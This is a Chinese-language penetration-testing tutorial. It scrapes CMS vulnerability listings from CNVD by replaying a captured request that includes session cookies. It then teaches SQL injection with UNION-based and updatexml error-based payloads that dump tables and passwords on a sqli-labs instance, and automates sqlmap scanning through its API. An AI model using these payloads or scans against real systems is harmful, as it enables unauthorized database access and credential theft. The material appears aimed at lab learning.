获取该网站漏洞列表,关于CMS

image.png

打开burpsuie

image.png

打开(搜索到cms结果页面的)要爬取页面

image.png

开启intercept,重新加载网页

image.png

多点几个下一页,观察burpsuite

image.png
image.png
image.png

发现post请求原数据为

这个样子

  1. POST /flaw/list.htm?flag=true HTTP/1.1
  2. Host: www.cnvd.org.cn
  3. Connection: close
  4. Content-Length: 385
  5. Cache-Control: max-age=0
  6. Origin: https://www.cnvd.org.cn
  7. Upgrade-Insecure-Requests: 1
  8. Content-Type: application/x-www-form-urlencoded
  9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
  10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
  11. Referer: https://www.cnvd.org.cn/flaw/list.htm?flag=true
  12. Accept-Encoding: gzip, deflate
  13. Accept-Language: zh-CN,zh;q=0.9
  14. Cookie: __jsluid_s=291f680c5a289ecb36b0880aaa5c03a5; __jsl_clearance=1564385854.189|0|qzmx5icNGuu8jWYRCjUcsZGZwtA%3D; JSESSIONID=CDDB992CDCCB4252C0C80D3D60784946
  16. number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate
  17. =&field=&order=&flag=true&keyword=CMS&condition=1&keywordFlag=0&cnvdId=&cnvdIdFlag=0&
  18. baseinfoBeanbeginTime=&baseinfoBeanendTime=&baseinfoBeanFlag=0&refenceInfo=&referenceScope
  19. =-1&manufacturerId=-1&categoryId=-1&editionId=-1&causeIdStr=&threadIdStr=&serverityIdStr=&
  20. positionIdStr=&max=20&offset='''

查看网页源码找规律

image.png

利用正则表达式找到a标签下的href标签

获取第一页所有漏洞列表
循环获取前5页的漏洞列表

  1. # -*-coding:utf-8-*-
  3. import hackhttp
  4. from bs4 import BeautifulSoup as BS
  5. import re
  7. def CMS(raw):
  8.     url = 'https://www.cnvd.org.cn/flaw/list.htm?flag=true'
  9.     hh = hackhttp.hackhttp()
  10.     code, head, html, redirect_url, log = hh.http(url=url, raw=raw)
  11.     # print code
  12.     # print html
  13.     soup = BS(html, 'lxml')
  14.     CMS_html = soup.body
  15.     # print CMS_html
  16.     CMS_BUGS = BS(str(CMS_html), 'lxml')
  17.     # print CMS_BUGS
  18.     BUGS = CMS_BUGS.find_all(name='a', attrs={'href': re.compile('/flaw/show/CNVD-.*?')})
  19.     for BUG in BUGS:
  20.         print BUG['title']
  23. raw_start = '''
  24. POST /flaw/list.htm?flag=true HTTP/1.1
  25. Host: www.cnvd.org.cn
  26. Connection: close
  27. Content-Length: 385
  28. Cache-Control: max-age=0
  29. Origin: https://www.cnvd.org.cn
  30. Upgrade-Insecure-Requests: 1
  31. Content-Type: application/x-www-form-urlencoded
  32. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
  33. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
  34. Referer: https://www.cnvd.org.cn/flaw/list.htm?flag=true
  35. Accept-Encoding: gzip, deflate
  36. Accept-Language: zh-CN,zh;q=0.9
  37. Cookie: __jsluid_s=291f680c5a289ecb36b0880aaa5c03a5; __jsl_clearance=1564385854.189|0|qzmx5icNGuu8jWYRCjUcsZGZwtA%3D; JSESSIONID=CDDB992CDCCB4252C0C80D3D60784946
  39. number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate=&field=&order=&flag=true&keyword=CMS&condition=1&keywordFlag=0&cnvdId=&cnvdIdFlag=0&baseinfoBeanbeginTime=&baseinfoBeanendTime=&baseinfoBeanFlag=0&refenceInfo=&referenceScope=-1&manufacturerId=-1&categoryId=-1&editionId=-1&causeIdStr=&threadIdStr=&serverityIdStr=&positionIdStr=&max=20&offset='''
  41. for pages_count in range(0, 101, 20):#表示[0,100],每循环一次,加上20
  42.     raw = raw_start + str(pages_count)
  43.     # print raw
  44.     CMS(raw)

sql注入实例教学

sql注入

  1. 数字型注入
  2. 1 or 1=1 -- 1
  3. 1 or 1=1 #
  6. 字符型注入
  7. 1' o 1=1 -- 1
  8. 1' o 1=1 #
  11. 基于联合查询的注入
  13. 1. 通过联合查询,确定列数
  14. select id,username from users union select 1,2;
  15. 2. 通过联合查询,获取当前数据库名以及版本
  16. select id,username from users union select database(),version();
  17. 3. 利用内置数据库information_schema中的TABLES表获取指定数据库的所有表名
  18. select id,username from users where id=-1 union select TABLE_NAME,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA='security';
  19. 4. 利用内置数据库information_schema中的COLUMN_NAME表获取的对应表的列名
  20. select id,username from users where id=-1 union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users';
  21. 5. 获取对应表的数据
  22. select id,username from users where id=-1 union select id,username from users;
  24. 获取表信息
  25. http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA='security' limit 3,1; -- 1
  26. 获取列信息
  27. http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users' limit 0,1; -- 1
  28. 获取表数据
  29. http://127.0.0.1/sqli/Less-2/?id=100 union select id,username,password from users; -- 1
  33. 基于函数报错的注入
  35. and updatexml(1,version(),0)#
  36. 完整显示版本名
  37. and updatexml(1,concat(0x7e,version()),0)
  39. 获取表名
  40. and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),0)
  41. ERROR 1242 (21000): Subquery returns more than 1 row
  43. 获取表名
  44. and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0)
  46. 获取列表
  47. and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1)),0)#
  49. 获取数据
  50. and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#
  51. and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#
  54. 更多的请查看sql注入闯关游戏文档

sql注入.pdf

深入了解SQLMAP API

geturl.py

  1. #coding=utf-8
  3. from bs4 import BeautifulSoup
  4. import hackhttp
  5. # 1. 定义url, 访问url,获取html内容
  6. url = "http://192.168.131.149/sqli/"
  7. hh = hackhttp.hackhttp()
  8. code, head, html, redirect_url, log = hh.http(url)
  9. # 2. 解析html内容, 使用lxml解析器
  10. soup = BeautifulSoup(html, "lxml");
  11. content = soup.find_all('map',id='fm_imagemap')  #尝试获取节点,因为calss和关键字冲突,所以改名class_
  12. print content
  13. # 3. 从解析的网页对象中获取对应的内容
  14. for k in soup.find_all('area'):#,找到div并且classpl2的标签
  15.    print(url+ k['href'] + '?id=1')           #取第一组的span中的字符串

autosqli.py

  1. #coding=utf-8
  2. import requests
  3. import json
  5. logo = "======auto sqli tools======  "
  6. print(logo)
  8. def sqlmap(host):
  9.     urlnew="http://127.0.0.1:8775/task/new"
  10.     urlscan="http://127.0.0.1:8775/scan/"
  11.     headers={"user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36"}
  12.     # 创建一个新任务
  13.     pd=requests.get(url=urlnew,headers=headers)
  14.     print('[*]New task')
  15.     # 获取返回的json数据,读取taskid
  16.     jsons=pd.json()
  17.     print("[*]id:",jsons['taskid'])
  18.     print("[*]success:",jsons["success"])
  19.     id=jsons['taskid']
  20.     # 使用taskid以及要扫描的url,构建数据
  21.     scan=urlscan+id+"/start"
  22.     print("[*]scanurl:",scan)
  23.     data=json.dumps({"url":"{}".format(host)})
  24.     headerss={"Content-Type":"application/json"}
  25.     # 向sqlmapapi服务器发出请求,等到扫描结果
  26.     scans=requests.post(url=scan,headers=headerss,data=data)
  27.     # 获取扫描状态
  28.     swq=scans.json()
  29.     print('--------scan-----------')
  30.     print('[*]scanid:',swq["engineid"])
  31.     print('[*]scansuccess:',swq["success"])
  32.     print('--------status---------')
  33.     status="http://127.0.0.1:8775/scan/{}/status".format(id)
  34.     print(status)
  35.     # 循环等待扫描结果
  36.     while True:
  37.         ret=requests.get(url=status,headers=headers)
  38.         # 当 status = terminated 即为扫描结束
  39.         if ret.json()['status'] == 'terminated':
  40.             # 获取扫描结果
  41.             datas=requests.get(url='http://127.0.0.1:8775/scan/{}/data'.format(id))
  42.             dat=datas.json()['data']
  43.             print('[*]data:',dat)
  44.             break
  45.         elif ret.json()['status'] == 'running':
  46.             continue
  48. sqlmap("http://192.168.131.149/sqli/Less-1/?id=1")

https://www.freebuf.com/articles/web/204875.html
深入了解SQLMAP API.pdf

相关命令:

  1. python sqlmapapi.py -s
  1.  python sqlmapapi.py -c